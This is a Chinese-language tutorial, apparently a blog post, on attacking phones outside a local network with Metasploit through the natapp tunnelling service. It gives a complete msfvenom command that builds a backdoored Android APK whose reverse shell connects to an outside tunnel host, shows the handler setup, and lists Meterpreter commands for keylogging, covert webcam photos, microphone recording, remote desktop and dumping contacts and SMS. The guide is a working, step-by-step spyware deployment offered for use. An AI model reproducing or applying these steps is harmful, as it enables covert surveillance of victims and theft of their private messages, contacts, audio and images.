常常使用metsploit的同窗可能會有疑問,爲啥我只能在同一局域網裏面滲透主機呢?......html
這主要是由於你的身處於內網之中。不知道你們對內網和外網的理解是什麼?這裏我給你們普及一下吧!linux
什麼是內網?內網接入方式:上網的計算機獲得的IP地址是Inetnet上的保留地址,保留地址有以下3種形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x內網的計算機以NAT(網絡地址轉換)協議,經過一個公共的網關訪問Internet。內網的計算機可Internet上的其餘計算機發送鏈接請求,但Internet上其餘的計算機沒法向內網的計算機發送鏈接請求。android
什麼是外網(也稱爲公網)?使用ADSL的用戶,若是隻有一個用戶一臺計算機在使用此寬帶,沒有使用路由功能,而是用撥號軟件直接撥號上網的,這種狀況下,該用戶目前所處的網絡爲外網,外網的用戶都擁有一個屬於本身的獨立IP地址.公網的計算機和Internet上的其餘計算機可隨意互相訪問。web
如何判斷你是網絡是內網仍是外網呢?輸入WIN+R進去MS-DOS命令行裏面,輸入:ipconfig看一下本身的ip:若是你的IP地址屬於保留地址(保留地址開頭爲:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那麼你的計算機就是運行在局域網內。服務器
使用natapp服務/內網穿透工具Ngrok 。網絡
這裏以natapp進行實驗app
你在natapp官網註冊好後得到一條免費隧道,添加tcp通道,端口號自定,例如2018,ip填127.0.0.1tcp
在linux下首先下載natapp的客戶端,而後再命令行內啓動natapp 語句: ./natapp -authtoken=************ 後面的星號換成本身的口令工具
(若是提示權限不夠 chmod a+x natapp )命令行
啓動成功後能夠看到下面圖片
ping 一下第一個圈內的服務器 獲得ip地址120.3.51.1 後面位端口號 34611
開始生成外網小馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk
必定要注意ip和端口填服務器的
將apk文件安裝到安卓手機上。
啓動 msfconsole
依次輸入下面的命令
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 2018
監聽127.0.0.1:2018 (內網穿透至關於先將數據發給服務器,而後由服務器發給內網中的咱們 )
啓動run
用你的電話卡流量試試看打開app
keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄
record_mic:錄製聲音(若是目標主機上有話筒的話)
webcam_chat:查看攝像頭接口
webcam_stream //開啓攝像頭
webcam_list:查看攝像頭列表
webcam_snap //隱祕拍照功能
webcam_snap 隱祕拍照功能 -i 1 或者2是開啓前置攝像頭和後置攝像頭的
run vnc:開啓遠程桌面
dump_contacts //導出電話號碼
dump_sms //導出信息
能夠輸入?查看更多命令